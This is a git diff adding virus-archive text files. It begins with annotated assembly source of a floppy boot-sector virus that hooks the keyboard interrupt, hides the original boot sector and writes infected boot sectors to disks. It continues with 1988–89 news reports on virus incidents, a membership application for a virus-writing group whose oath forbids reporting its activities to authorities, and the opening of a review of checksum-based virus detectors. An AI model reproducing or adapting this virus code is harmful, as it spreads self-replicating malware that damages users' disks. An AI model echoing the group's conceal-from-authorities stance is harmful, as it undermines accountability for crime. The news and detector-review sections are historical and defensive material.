Load and execute REAL boot sector from track 40, head 0, sector 8 ; +;-----------------------------------------------------------------------; +BEGIN: CLI ;INITIALIZE STACK + XOR AX,AX ; + MOV SS,AX ; + MOV SP,offset TOS ; + STI ; + ; + MOV BX,0040H ;ES = TOP OF MEMORY - (7C00H+512) + MOV DS,BX ; + MOV AX,[0013H] ; + MUL BX ; + SUB AX,07E0H ; (7C00H+512)/16 + MOV ES,AX ; + ; + PUSH CS ;DS = CS + POP DS ; + ; + CMP DI,3456H ;IF THE VIRUS IS REBOOTING... + JNE B_10 ; + DEC Word Ptr [COUNTER_1] ;...LOW&HI:COUNTER_1-- + ; +B_10: MOV SI,SP ;SP=7C00 ;COPY SELF TO TOP OF MEMORY + MOV DI,SI ; + MOV CX,512 ; + CLD ; + REP MOVSB ; + ; + MOV SI,CX ;CX=0 ;SAVE FIRST 32 INT VETOR ADDRESSES TO + MOV DI,offset BEGIN - 128 ; 128 BYTES BELOW OUR HI CODE + MOV CX,128 ; + REP MOVSB ; + ; + CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) + ; + PUSH ES ;ES=HI ; JUMP TO OUR HI CODE WITH + POP CS + ; + PUSH DS ;DS=0 ; ES = DS + POP ES ; + ; + MOV BX,SP ; SP=7C00 ;LOAD REAL BOOT SECTOR TO 0000:7C00 + MOV DX,CX ;CX=0 ;DRIVE A: HEAD 0 + MOV CX,2708H ; TRACK 40, SECTOR 8 + MOV AX,0201H ; READ SECTOR + INT 13H ; (common to 8/9 sect. 1/2 sided!) + JB $ ; HANG IF ERROR + ; + JMP JMP_BOOT ;JMP 0000:7C00 + ; +;-----------------------------------------------------------------------; +; SAVE THEN REDIRECT INT 9 VECTOR ; +; ; +; ON ENTRY: DS = 0 ; +; ES = WHERE TO SAVE OLD_09 & (HI) ; +; WHERE NEW_09 IS (HI) ; +;-----------------------------------------------------------------------; +PUT_NEW_09: ; + DEC Word Ptr [0413H] ;TOP OF MEMORY (0040:0013) -= 1024 + ; + MOV SI,9*4 ;COPY INT 9 VECTOR TO + MOV DI,offset OLD_09 ; OLD_09 (IN OUR HI CODE!) 
+ MOV CX,0004 ; + ; + CLI ; + REP MOVSB ; + MOV Word Ptr [9*4],offset NEW_09 + MOV [(9*4)+2],ES ; + STI ; + ; + RET ; + ; +;-----------------------------------------------------------------------; +; RESET KEYBOARD, TO ACKNOWLEDGE LAST CHAR ; +;-----------------------------------------------------------------------; +ACK_KEYBD: ; + IN AL,61H ;RESET KEYBOARD THEN CONTINUE + MOV AH,AL ; + OR AL,80H ; + OUT 61H,AL ; + XCHG AL,AH ; + OUT 61H,AL ; + JMP RBOOT ; + ; +;-----------------------------------------------------------------------; +; DATA AREA WHICH IS NOT USED IN THIS VERSION ; +; REASON UNKNOWN ; +;-----------------------------------------------------------------------; +TABLE DB 27H,0,1,2 ;FORMAT INFORMATION FOR TRACK 39 + DB 27H,0,2,2 ; (CURRENTLY NOT USED) + DB 27H,0,3,2 ; + DB 27H,0,4,2 ; + DB 27H,0,5,2 ; + DB 27H,0,6,2 ; + DB 27H,0,7,2 ; + DB 27H,0,8,2 ; + ; +;A7C9A LABEL BYTE ; + DW 00024H ;NOT USED + DB 0ADH ; + DB 07CH ; + DB 0A3H ; + DW 00026H ; + ; +;L7CA1: ; + POP CX ;NOT USED + POP DI ; + POP SI ; + POP ES ; + POP DS ; + POP AX ; + POPF ; + JMP 1111:1111 ; + ; +;-----------------------------------------------------------------------; +; IF ALT & CTRL & DEL THEN ... ; +; IF ALT & CTRL & ? THEN ... ; +;-----------------------------------------------------------------------; +NEW_09: PUSHF ; + STI ; + ; + PUSH AX ; + PUSH BX ; + PUSH DS ; + ; + PUSH CS ;DS=CS + POP DS ; + ; + MOV BX,[ALT_CTRL W] ;BX=SCAN CODE LAST TIME + IN AL,60H ;GET SCAN CODE + MOV AH,AL ;SAVE IN AH + AND AX,887FH ;STRIP 8th BIT IN AL, KEEP 8th BIT AH + ; + CMP AL,1DH ;IS IT A [CTRL]... + JNE N09_10 ;...JUMP IF NO + MOV BL,AH ;(BL=08 ON KEY DOWN, BL=88 ON KEY UP) + JMP N09_30 ; + ; +N09_10: CMP AL,38H ;IS IT AN [ALT]... + JNE N09_20 ;...JUMP IF NO + MOV BH,AH ;(BH=08 ON KEY DOWN, BH=88 ON KEY UP) + JMP N09_30 ; + ; +N09_20: CMP BX,0808H ;IF (CTRL DOWN & ALT DOWN)... + JNE N09_30 ;...JUMP IF NO + ; + CMP AL,17H ;IF [I]... + JE N09_X0 ;...JUMP IF YES + CMP AL,53H ;IF [DEL]... 
+ JE ACK_KEYBD ;...JUMP IF YES + ; +N09_30: MOV [ALT_CTRL],BX ;SAVE SCAN CODE FOR NEXT TIME + ; +N09_90: POP DS ; + POP BX ; + POP AX ; + POPF ; + ; + DB 0EAH ;JMP F000:E987 +OLD_09 DW ? ; + DW 0F000H ; + ; +N09_X0: JMP N09_X1 ; + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +RBOOT: MOV DX,03D8H ;DISABLE COLOR VIDEO !?!? + MOV AX,0800H ;AL=0, AH=DELAY ARG + OUT DX,AL ; + CALL DELAY ; + MOV [ALT_CTRL],AX ;AX=0 ; + ; + MOV AL,3 ;AH=0 ;SELECT 80x25 COLOR + INT 10H ; + MOV AH,2 ;SET CURSOR POS 0,0 + XOR DX,DX ; + MOV BH,DH ; PAGE 0 + INT 10H ; + ; + MOV AH,1 ;SET CURSOR TYPE + MOV CX,0607H ; + INT 10H ; + ; + MOV AX,0420H ;DELAY (AL=20H FOR EOI BELOW) + CALL DELAY ; + ; + CLI ; + OUT 20H,AL ;SEND EOI TO INT CONTROLLER + ; + MOV ES,CX ;CX=0 (DELAY) ;RESTORE FIRST 32 INT VECTORS + MOV DI,CX ; (REMOVING OUR INT 09 HANDLER!) + MOV SI,offset BEGIN - 128 ; + MOV CX,128 ; + CLD ; + REP MOVSB ; + ; + MOV DS,CX ;CX=0 ;DS=0 + ; + MOV Word Ptr [19H*4],offset NEW_19 ;SET INT 19 VECTOR + MOV [(19H*4)+2],CS ; + ; + MOV AX,0040H ;DS = ROM DATA AREA + MOV DS,AX ; + ; + MOV [0017H],AH ;AH=0 ;KBFLAG (SHIFT STATES) = 0 + INC Word Ptr [0013H] ;MEMORY SIZE += 1024 (WERE NOT ACTIVE) + ; + PUSH DS ;IF BIOS F000:E502 == 21E4... + MOV AX,0F000H ; + MOV DS,AX ; + CMP Word Ptr [0E502H],21E4H ; + POP DS ; + JE R_90 ; + INT 19H ; IF NOT...REBOOT + ; +R_90: JMP 0F000:0E502H ;...DO IT ?!?!?! + ; +;-----------------------------------------------------------------------; +; REBOOT INT VECTOR ; +;-----------------------------------------------------------------------; +NEW_19: XOR AX,AX ; + ; + MOV DS,AX ;DS=0 + MOV AX,[0410] ;AX=EQUIP FLAG + TEST AL,1 ;IF FLOPPY DRIVES ... 
+ JNZ N19_20 ;...JUMP +N19_10: PUSH CS ;ELSE ES=CS + POP ES ; + CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) + INT 18H ;LOAD BASIC + ; +N19_20: MOV CX,0004 ;RETRY COUNT = 4 + ; +N19_22: PUSH CX ; + MOV AH,00 ;RESET DISK + INT 13 ; + JB N19_81 ; + MOV AX,0201 ;READ BOOT SECTOR + PUSH DS ; + POP ES ; + MOV BX,offset BEGIN ; + MOV CX,1 ;TRACK 0, SECTOR 1 + INT 13H ; +N19_81: POP CX ; + JNB N19_90 ; + LOOP N19_22 ; + JMP N19_10 ;IF RETRY EXPIRED...LOAD BASIC + ; +;-----------------------------------------------------------------------; +; Reinfection segment. ; +;-----------------------------------------------------------------------; +N19_90: CMP DI,3456 ;IF NOT FLAG SET... + JNZ RE_INFECT ;...RE INFECT + ; +JMP_BOOT: ;PASS CONTROL TO BOOT SECTOR + JMP 0000:7C00H ; + ; +;-----------------------------------------------------------------------; +; Reinfection Segment. ; +;-----------------------------------------------------------------------; +RE_INFECT: ; + MOV SI,offset BEGIN ;COMPARE BOOT SECTOR JUST LOADED WITH + MOV CX,00E6H ; OURSELF + MOV DI,SI ; + PUSH CS ; + POP ES ; + CLD ; + REPE CMPSB ; + JE RI_12 ;IF NOT EQUAL... + ; + INC Word Ptr ES:[COUNTER_1] ;INC. COUNTER IN OUR CODE (NOT DS!) + ; +;MAKE SURE TRACK 39, HEAD 0 FORMATTED ; + MOV BX,offset TABLE ;FORMAT INFO + MOV DX,0000 ;DRIVE A: HEAD 0 + MOV CH,40-1 ;TRACK 39 + MOV AH,5 ;FORMAT + JMP RI_10 ;REMOVE THE FORMAT OPTION FOR NOW ! + ; +; <<< NO EXECUTION PATH TO HERE >>> ; + JB RI_80 ; + ; +;WRITE REAL BOOT SECTOR AT TRACK 39, SECTOR 8, HEAD 0 +RI_10: MOV ES,DX ;ES:BX = 0000:7C00, HEAD=0 + MOV BX,offset BEGIN ;TRACK 40H + MOV CL,8 ;SECTOR 8 + MOV AX,0301H ;WRITE 1 SECTOR + INT 13H ; + ; + PUSH CS ; (ES=CS FOR PUT_NEW_09 BELOW) + POP ES ; + JB RI_80 ;IF WRITE ERROR...JUMP TO BOOT CODE + ; + MOV CX,0001 ;WRITE INFECTED BOOT SECTOR ! + MOV AX,0301 ; + INT 13H ; + JB RI_80 ; IF ERROR...JUMP TO BOOT CODE + ; +RI_12: MOV DI,3456H ;SET "JUST INFECTED ANOTHER ONE"... 
+ INT 19H ;...FLAG AND REBOOT + ; +RI_80: CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) + DEC Word Ptr ES:[COUNTER_1] ; (DEC. CAUSE DIDNT INFECT) + JMP JMP_BOOT ; + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +N09_X1: MOV [ALT_CTRL],BX ;SAVE ALT & CTRL STATUS + ; + MOV AX,[COUNTER_1] ;PUT COUNTER_1 INTO RESET FLAG + MOV BX,0040H ; + MOV DS,BX ; + MOV [0072H],AX ; 0040:0072 = RESET FLAG + JMP N09_90 ; + ; +;-----------------------------------------------------------------------; +; DELAY ; +; ; +; ON ENTRY AH:CX = LOOP COUNT ; +;-----------------------------------------------------------------------; +DELAY: SUB CX,CX ; +D_01: LOOP $ ; + SUB AH,1 ; + JNZ D_01 ; + RET ; + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +A7DF4 DB 27H,00H,8,2 + +COUNTER_1 DW 001CH +ALT_CTRL DW 0 +A7DFC DB 27H,0,8,2 +[2.10] + + Virili In The News + ------------------ + This section deals with a large amount of stuff, basically, a bunch + of viruses and stuff that have been in the newspapers and magazines cuz + all of the damage they have done. Enjoy.... + + + There's A Virus In My Software + + Mischief-makers at the computer + are deliberately endangering data + + By Philip J. Hilts + + Washington Post Staff Writer + + The Washington Post Weekly Edition, Page #38. May 23-29, 1988. + + Tiny programs that are deliberately cause mischief are epidemic among +computers and causing nervousness among those who monitor them. Since the +first tests of the notion in 1983 that machines can catch and spread +"information diseases," the computer world has reached the point at which as +many as thirty instances of "computer virus" have been reported in the past +year, affecting tens of thousands of U.S. computers alone. 
+ + Such viruses have been found at the National Aeronautics and Space +Administration, International Business Machines Corporation, the House of +Representatives, at least six universities, several major computer networks +such as Comp-u-serve and several businesses, including the world's largest +computer-service company, the $4.4 billion Electronic Data Systems +Corporation of Dallas, Texas. + + Written by malicious programmers, the viruses are sneaked into computer +systems by piggybacking them on legitimate programs and messages. There, +they may be passed along or instructed to wait until a prearranged moment to +burst forth and destroy data. + + Hundreds of computers at the Hebrew University of Jerusalem and other +places in Israel were hit last fall by a virus designed to spread and then, +in one swipe on a Friday the thirteenth, destroy all data in any computer it +could reach. + + If not for an error by it's author, who has not been caught, the virus +could have caused devastation among micro-computers in Israel and other +nations. The virus did not check to see whether it already had infected a +program and so infected some computers hundreds of times, crowding their +memories enough to call attention to itself. + + In a seven-month campaign, programmers in Israel hastened to find +infected machines and ensure that the smallest number would be affected +before Friday, May 13th. Officials say they initially thought that the +infection was connected with the anniversary of the last day that Palestine +existed as a political entity but subsequently decided that it most likely +involved just Friday the thirteenth. + + Apparently, the campaign was successful; there has been no word of +substantial damage. This past Friday the thirteenth is this year's only such +day. + + At the Aldus Corporation of Seattle, Washington, a major software maker, +executives are huddling with lawyers to try to determine whether +international spread of such diseases is illegal. 
No virus cases have been +taken to court. + + At N.A.S.A. headquarters in Washington, several hundred computers had to +be resuscitated after being infected. N.A.S.A. officials have taken +precautions and reminded their machines' users to follow routine computer +hygiene: Don't trust foreign data or strange machines. + + Viruses have the eerie ability to perch disguised among legitimate data +just as biological viruses hide among genes in human cells, then spring out +unexpectedly, multiplying and causing damage. Experts say that even when +they try to study viruses in controlled conditions, the programs can get out +of control and erase everything in a computer. The viruses can be virtually +impossible to stop if their creators are determined enough. + + "The only way to protect every-body from them is to do something much +worse than the viruses: Stop talking to one another with computers," says +William H. Murray, an information-security specialist at Ernst and Whinney +financial consultants in Hartford, Connecticut. + + Hundreds of programs and files have been destroyed by viruses, and +thousands of hours of repair or prevention time have been logged. +Programmers have quickly produced antidote programs with such titles as +"Vaccine," "Flu Shot," "Data Physician," "Syringe." + + Experts says known damage is minimal compared with the huge, destructive +potential. They express the hope that the attacks will persuade computer +users to minimize access to programming and data. + + "What we are dealing with here is the fabric of trust in society," says +Murray. "With computer viruses, we have a big vulnerability." + + Early this year, Aldus Corporation discovered that a virus had been +introduced that infected at least five-thousand copies of a new drawing +program called Freehand for the Macintosh computer. The infected copies were +packaged, sent to stores and sold. 
On March 2, the virus interrupted users +by flashing this message on their screens: + + "Richard Brandow, publisher of MacMag, and its entire staff would like +to take this opportunity to convey their universal message of peace to all +Macintosh users around the world." + + Viruses are the newest of evolving methods of computer mayhem, says +Donn B. Parker, a consultant at SRI International, a computer research firm +in Menlo Park, California. One is the "Trojan horse," a program that looks +and acts like a normal program but contains hidden commands that eventually +take effect, ordering mischief. Others include the "time bomb," which +explodes at a set time, and the "logic bomb," which goes off when the +computer arrives at a certain result during normal computation. The "salami +attack" executes barely noticeable results small acts, such as shaving a +penny from thousands of accounts. + + The computer virus has the capability to command the computer to make +copies of the virus and spread them. A virus typically is written only as a +few hundred characters in a program containing tens of thousands of +characters. When the computer reads legitimate instructions, it encounters +the virus, which instructs the computer to suspend normal operations for a +fraction of a second. + + During that time, the virus instructs the computer to check for other +copies of itself and, if none is found, to make and hide copies. Instruction +to commit damage may be included. A few infamous viruses found in the past +year include: + +[] The "scores" virus. Named after a file it spawns, it recently entered + several hundred Macintosh computers at N.A.S.A. headquarters. "It looks + as if it searching for a particular Macintosh program with a name that + no one recognizes," spokesman Charles Redmond says. 
+ + This virus, still spreading, has reached computers in Congress' + information system at the National Oceanic and Atmospheric + Administration and at Apple Computer Incorporated's government-systems + office in Reston, Virginia. It has hit individuals, businesses and + computer "bulletin boards" where computer hobbyists share information. + It apparently originated in Dallas, Texas and has caused damage, but + seemingly only because of its clumsiness, not an instruction to do + damage. + +[] The "brain" virus. Named by its authors, it was written by two brothers + in a computer store in Lahore, Pakistan, who put their names, addresses + and phone number in the virus. Like "scores," it has caused damage + inadvertently, ordering the computer to copy itself into space that + already contain information. + +[] The "Christmas" virus. It struck last December after a West German + student sent friends a Christmas message through a local computer + network. The virus told the receiver's computer to display the + greeting, then secretly send the virus and message to everyone on the + recipient's regular electronic mailing list. + + The student apparently had no idea that someone on the list had + special, restricted access to a major world-wide network of several + thousand computers run by I.B.M. The network broke down within hours + when the message began multiplying, stuffing the computers' memories. + No permanent damage was done, and I.B.M. says it has made repetition + impossible. + + Demonstrations have shown that viruses can invade the screens of users +with the highest security classification, according to Fred Cohen of +Cincinnati, a researcher who coined the term "computer Viruses." A standard +computer-protection device at intelligence agencies, he says, denies giving +access by a person at one security level to files of anyone else at a higher +level and allows reading but denies writing of files of anyone lower. 
+ + This, however, "allows the least trusted user to write a program that +can be used by everyone" and is "very dangerous," he says. + + Computers "are all at risk," says Cohen, "and will continue to be... not +just from computer viruses. But the viruses represent a new level of threat +because of their subtleness and persistence." + + +1.) Computer "viruses" are actually immature computer programs. Most are + written by malicious programmers intent on destroying information in + computers for fun. + +2.) Those who write virus programs often conceal them on floppy disks that + are inserted in the computer. The disks contain all programs needed to + run the machine, such as word processing programs, drawing programs or + spread sheet programs. + +3.) A malicious programmer makes the disk available to others, saying it + contains a useful program or game. These programs can be lent to others + or put onto computerized: "bulletin boards" where anyone can copy them + for personal use. + +4.) A computer receiving the programs will "read" the disk and the tiny virus + program at the same time. The virus may then order the computer to do a + number of things: + + A.) Tell it to read the virus and follow instructions. + + B.) Tell it to make a copy of the virus and place it on any disk inserted + in the machine today. + + C.) Tell it to check the computer's clock, and on a certain date destroy + information that tells it where data is stored on any disk: if an + operator has no way of retrieving information, it is destroyed. + + D.) Tell it not to list the virus programs when the computer is asked for + an index of programs. + +5.) In this way, the computer will copy the virus onto many disks--perhaps + all or nearly all the disks used in the infected machine. The virus may + also be passed over the telephone, when one computer sends or receives + data from another. + +6.) 
Ultimately hundreds or thousands of people may have infected disks and + potential time bombs in their systems. + + + ----------------------------------------------- + 'Virus' infected hospital computers, + led to epidemic of software mix-ups + ----------------------------------------------- + From the San Diego Tribune + March 23, 1989 + + + BOSTON (UPI) -- A "virus" infected computers at three Michigan hospitals +last fall and disrupted patient diagnoses at two of the centers in what appears +to be the first such invasion of a medical computer, it was reported yesterday. + + The infiltration did not harm any patients but delayed diagnoses by +shutting down computers, creating files of non-existent patients and garbling +names on patient records, which could have caused more serious problems, a +doctor said. + + "It definitely did affect care in delaying things and it could have +affected care in terms of losing this information completely," said Dr. Jack +Juni, a staff physician at the William Beaumont Hospitals in Troy and Royal Oak, +Mich., two of the hospitals involved. + + If patient information had been lost, the virus could have forced doctors +to repeat tests that involve exposing patients to radiation, Juni said +yesterday. The phony and garble files could have caused a mix-up in patient +diagnosis, he said. + + "This was information we were using to base diagnoses on," said Juni, who +reported the case in a letter in The New England Journal of Medicine. "We were +lucky and caught it in time." + + A computer virus is a set of instructions designed to reproduce and spread +from computer to computer. Some viruses do damage in the process, such as +destroying files or overloading computers. + + Paul Pomes, a computer virus expert at the University of Illinois in +Champaign, said this was the first case he had heard of in which a virus had +disrupted a computer used for patient care or diagnosis in a hospital. 
+ + Such disruptions could become more common as personal computers are used +more widely in hospitals, Juni and Pomes said. More people know how to program +-- and therefore sabotage -- personal computers than the more specialized +computers that previously have been used, Pomes said. + + The problem in Michigan surfaced when a computer used to display images +used to diagnose cancer and other diseases began to malfunction at the 250-bed +Troy hospital in August 1988. + + In October, Juni discovered a virus in the computer in the Troy hospital. +The next day, Juni found the same virus in a similar computer in the 1,200-bed +Royal Oak facility, he said. + + The virus apparently arrived in a program in a storage disk that was part +of the Troy computer system, he said. It probably was spread inadvertently to +the Royal Oak computer on a floppy disk used by a resident who worked at both +hospitals to write a research paper, he said. + + The virus also spread to the desk-top computers at the University of +Michigan Medical Center in Ann Arbor, where it was discovered before it caused +problems. + + + "Prosecutor Wins Conviction In Computer Data Destruction" + + September 21, 1988 + + + Fort Worth, Texas (AP) - A former programmer has been convicted of planting +a computer "virus" in his employer's system that wiped out 168,000 records and +was activated like a timb bomb, doing its damage two days after he was fired. + + Tarrant County Assistant District Attorney Davis McCown said he believes e +is the first prosecutor in the country to have someone convicted for destroying +computer records using a "virus." + + "We've had people stealing through computers, but not this type of case," +McCown said. "The basis for this offense is deletion." + + "It's very rare that the people who spread the viruses are caught," said +John McAfee, chairman of the Computer Virus Industry Association in Santa Clara, +which helps educate the public about viruses and find ways to fight them. 
+ + "This is absolutely the first time" for a conviction, McAfee said. + + "In the past, prosecutors have stayed away from this kind of case because +they're too hard to prove," McCown said yesterday. They have also been reluctant +because the victim doesn't want to let anyone know there has been a breach of +security." + + Donald Gene Burleson, 40, was convicted of charges of harmful access to a +computer, a third-degree feloy that carries up to 10 years in prison and up to +$5,000 in fines. + + A key to the case was the fact that State District Judge John Bradshaw +allowed the computer program that deleted the files to be introduced as +evidence, McCown said. It would have been difficult to get a conviction +otherwise, he said. + + The District Court jury deliberated six hours before bringing back the +first conviction under the state's 3-year-old computer sabotage law. + + Burleson planted the virus in revenge for his firing from an insurance +company, McCown said. + + Jurors were told during a technical and sometimes-complicated three-week +trial that Burleson planted a rogue program in the computer system used to store +records at USPA and IRA Co., a Fort Worth-based insurance and brokerage firm. + + A virus is a computer program, often hidden in apparently normal computer +software, that instructs the computer to change or destroy information at a +given time or after a certain sequence of commands. + + The virus, McCown said, was activated Sept. 21, 1985, two days after +Burleson was fired as a computer programmer, because of alleged personality +conflicts with other employees. + + "There were a series of programs built into the system as early as Labor +Day (1985)," McCown said. "Once he got fired, those programs went off." + + The virus was discovered two days later, after it had eliminated 168,00 +payroll records, holding up company paychecks for more than a month. 
The virus +could have caused hundreds of thousands of dollars in damage to the system had +it continued, McCown said. + WEST COAST CORRUPTED ALLEGIANCE PRESENTS: + + -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + + >> CORRUPTED PROGRAMMING INTERNATIONAL << + >> MEMBERSHIP APPLICATION << + + -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + (CPI is a sub-group of WCCA) + +NOTE: The following information is of a totally confidential nature. We must + question you in depth and thouroughly so that our knowledge and idea + of you will be quite complete. Remember, it is the fate of our voting + members who will decide upon your membership, as the result of your + response to this questionarre. Please answer the following completely + and to the best of your ability. Also note that we may decide to voice + validate you or gather any other information through other sources and + will discover if you have placed false or misleading information on + this application. + + +PERSONAL INFORMATION: +----------------------------------------------------------------------------- + Alias(es) You HAVE Used : + Alias(es) You Currently Use : + Your FULL REAL Name : + Your Voice Phone Number :(###)###-#### + Your Data Phone Number :(###)###-#### + Your Mailing Address : + Your City, State & Zip : + Your Age : + Occupation/Grade : + Place of Employment/School : + Work Phone Number : + Your Interests And Hobbies : + +Are You IN ANY WAY Affiliated With ANY Governmental/Law Enforcement Agency? +If So, In What Way? (Such as FBI/Sheriff/Police/etc. YOU KNOW WHAT I MEAN) +: +: + +Are You IN ANY WAY Affiliated With The Telephone Company Or Any Type Of Phone, +Data, Or Long Distance Type Of Company? If So, In What Way? 
+: +: + + +COMPUTER INFORMATION/EXPERIENCE +----------------------------------------------------------------------------- + Computer Experience (time) : + Modeming Experience (time) : + BBS's You Frequent (Name/#) : + Some Elite References : + Computers You Have Used : + Computer(s) You Are Using : + Computer You Prefer : + Languages You Have Tried : + Languages You Know Well : + Your Best Language : + Have You Ever Phreaked : + Do You Phreak Regularly : + Have You Ever Hacked : + Do You Hack Regularly : + Have You Ever Cracked : + Do You Crack Regularly : + Ever Made A Virus/Trojan : + Major Accomplishments : + : + +INTERVIEW +----------------------------------------------------------------------------- +Answer In 4 Lines Or Less: + +What do you think Corrupted Programming International is? +: +: +: +: + +When did you first hear about CPI? +: +: +: +: + +Why do you want to be a member of CPI? +: +: +: +: + +Do you know any of the members of CPI? Can you name any or the founders of CPI? +: +: +: +: + +Have you considered the distribuition of Viruses/Trojans as a "crime"? Why +or why not? Have you ever considered the consequences that could result +from the acts of releasing a Virus/Trojan? (morally speaking?) +: +: +: +: + +Have you written any text files? (On any underground type of subject) +: +: +: +: + +Are you a member of any other group(s)? Can you name them and their HQ BBS? +: +: +: +: + +What would you consider yourself if you were admitted into CPI, a programmer, +a phreaker, a distributor, a information gatherer, or a vegetable? +: +: +: +: + +Why would you ever want to release or aid in releasing a potential virus/trojan +to the public? +: +: +: +: + +Can you contribute to CPI? How? +:(do you have access to info concerning virus/trojans) +:(exceptional programmer?) +:(got connections?) +:(anything extraordinary?) 
+ + +OATH +----------------------------------------------------------------------------- +Typing your name at the bottom of the following paragraph is the same as +signing your name on an official document. + +authorities - As stated in the document below, the term authorities shall + be defined as any law enforcement agency or any agency that + is/may be affiliated with any law enforcement agency. Also, + this includes any company or agency or person which is/may + be involved with the telephone company or any telephone-type + of service(s). + +I [your name here] do solemnly swear never to report neither to my peers nor +the authorities the actions and duties performed by this group, Corrupted +Programming International, on any account. Also, I realize that if I leave +CPI and am no longer a member of CPI, it is my duty, as signed below, to uphold +the greatest confidence of CPI's activities, and I agree that any information I +may report to any one or any thing CANNOT be used against CPI and its members +in a court of law. I fully understand that if I were to become affiliated with +the authorities that it would be my duty to remove myself from any membership +if my position presented itself as contradictory towards the group, CPI and its +members. I also comprehend that if I were to be confronted by the authorities, +it my duty as a CPI member, as signed below, is to never disclose or discuss +CPI's activities to them; however, if I do, I fully agree that the information +disclosed or discussed cannot then be used against CPI or any member(s) of CPI +in a court of law. I further agree that all the terms and restrictions as noted +above also correspond to the entire group of WCCA, West Coast Corrupted +Allegiance. + +Typed:____________________ + + +----------------------------------------------------------------------------- + .Answer Each Question To The Best And Fullest Of Your Ability. 
+----------------------------------------------------------------------------- + + Upload ALL Applications To The WCCA Headquarters BBS + + T H E A N D R O M E D A S T R A I N + + Future WCCA Support BBS's Will Be Active - Applications May Be Turned In Then + \ No newline at end of file diff --git a/textfiles.com/virus/crcrevue.vir b/textfiles.com/virus/crcrevue.vir new file mode 100644 index 00000000..516ae2e7 --- /dev/null +++ b/textfiles.com/virus/crcrevue.vir 
@@ -0,0 +1,1575 @@ + Comparison: Products to Detect Changes to Programs + + Prepared by David J. Stang, Ph.D. + and (c) 1990, 1991 by + the National Computer Security Association + Suite 309, 4401-A Connecticut Ave NW + Washington DC 20008 + Voice: 202-364-8252 + BBS: 202-364-1304 + +This document may be freely distributed, but may not be altered +in any way. + +This is a review of some of those checksum or CRC comparison +programs. In it, I make an effort to concisely describe the +merits of this class of products, and then to help +you in selecting a product from their ranks. + +There is a difference between checksum algorithms and CRC -- +cyclic redundancy check -- algorithms. The latter usually uses a +table, and is usually a bit slower than the former. Despite the +differences, many authors seem to use the words +interchangeably, and we will continue the sloppy practice in this +chapter. + +Each file has a unique fingerprint in the form of a checksum +or CRC. Changes in any character within the file likely change +the checksum or CRC. If a file's original CRC is known -- +perhaps recorded in a file elsewhere -- and its current CRC is +known, the two values can be compared. Any difference indicates +that the file has been changed, and offers reason to investigate +further. For example, DELOUSE allows you to build a list of +critical system files that are normally subject to attack, and +check them periodically for changes. + +If a program's size is changed, it must be concluded that some +modification has occured to the file. If the size has not changed, +some modification is still possible. A file that contains the simple +message Hi Mom! could be modified so that it contained the +message Hi Dad!, and it would not show any change in size. + +A much tougher test of whether a file has been modified is to +compute the checksum or CRC cyclic redundancy check. At +this writing, there are no viruses able to modify a file without +modifying the file's CRC. 
Thus any checksum checker will work +just fine in catching viruses, providing that you use it to +establish checksums before a virus has modified your files. + +How is the checksum computed? Simply adding the values of all +the characters in the file is not enough, as a file containing just +"AE" would produce the same result as a file with just "EA". +Rather, the first byte of a file is read, and an algorithm applied +to it. This algorithm does something to the value of the byte, +such as rotating the bits a certain number of times, and logically +ANDING or ORING the bits to something else. The result of +that algorithm is then applied to the next byte of the file. The +process is repeated until the final byte is reached, and the +remainder is recorded. During this process, different algorithms +might be used for different portions of the code being processed. +With most procedures, a small file produces a checksum value of +the same size as a large file. + +Is there such as thing as "the" CRC value? No. The algorithm +used defines the result. There are two popular algorithms in use: +a standard CCITT CRC and a popular XMODEM CRC. Consider +COMMAND.COM for DOS 3.3 dated 2/2/88 and taking 25308 +bytes. Here are some of the checksums produced for this file by +various programs. SSCRC and Validate (method 1) use the +CCITT standard. All others in the list use some other approach. + + o BSearch, 16-bit CRC - 13369 (3439 h) + o BSearch, CRCTT - 10994 (2AC0 h) + o CHKSUM - 20011 (4E2B h) + o CRCDOS - 59676 (E91C h) + o Delouse, method 1 - 1073916 (1062FC h) + o Delouse, method 2 - 1067428 (1049A4 h) + o Delouse, method 3 - 1048666 (10005A h) + o The Detective, CRC 1 - 26939 (693B h) + o The Detective, CRC 2 - 54914 (D682 h) + o Module Integrity Check - 24922 (615A) + o SSCRC - 52167 (CBC7 h) + o Validate, method 1 - 52167 (CBC7 h) + o Validate, method 2 - 4024 (0FB8 h) + o VCheck - 2141344 (0020ACA0 h) + + + + WHY DETECT CHANGES? + + + +There are several good reasons. 
+ + o Viruses have great difficulty infecting your machine + without making some change in it. To detect a change + is to begin the process of detecting a virus. Although + some are concerned that a change-detecting program + cannot prove there isn't already a virus in your + computer, the fact is that you needn't worry about this. + If you infect your computer with a dozen viruses, then + measure its state, one of these viruses will change that + state in the next hour or so; a remeasurement + establishes that something is afoot. + + o Occasionally things go wrong with computer hardware + and software. You run CHKDSK and discover a + number of lost clusters in a number of lost chains. You + scrap these clusters, but wonder what files you've lost. + A proper change-detection program will give you a list + of files deleted since your last run. You can then + restore them from your backups. + + o In many organizations, we only want to permit the use + of "authorized software." Using a proper + change-detection program, you can establish what + software was added to the machine since your last run. + Any "extra" software will quickly come to your + attention. + + + + CAN A VIRUS BEAT THE SYSTEM? + + +The answer may be yes. You need to know how, so it doesn't +happen to you. The defeat can come at the hands of a +CRC-aware virus (none exists yet) or at the hands of a stealth +virus (there are several now). + + + + CRC-AWARE VIRUSES + + +In theory, a virus could be written that would compute a file's +CRC, add itself to the file, then replace additional characters +from the file until the new CRC was the same as the old one. +Such a virus would escape the attention of many checksum +checkers. + +Programs could catch such a virus by using an incremental +cyclic redundancy check approach. In this approach, files are +dissected into randomly-sized blocks of data, using dynamic +block size allocations that allow files as small as one byte to be +accurately checked. 
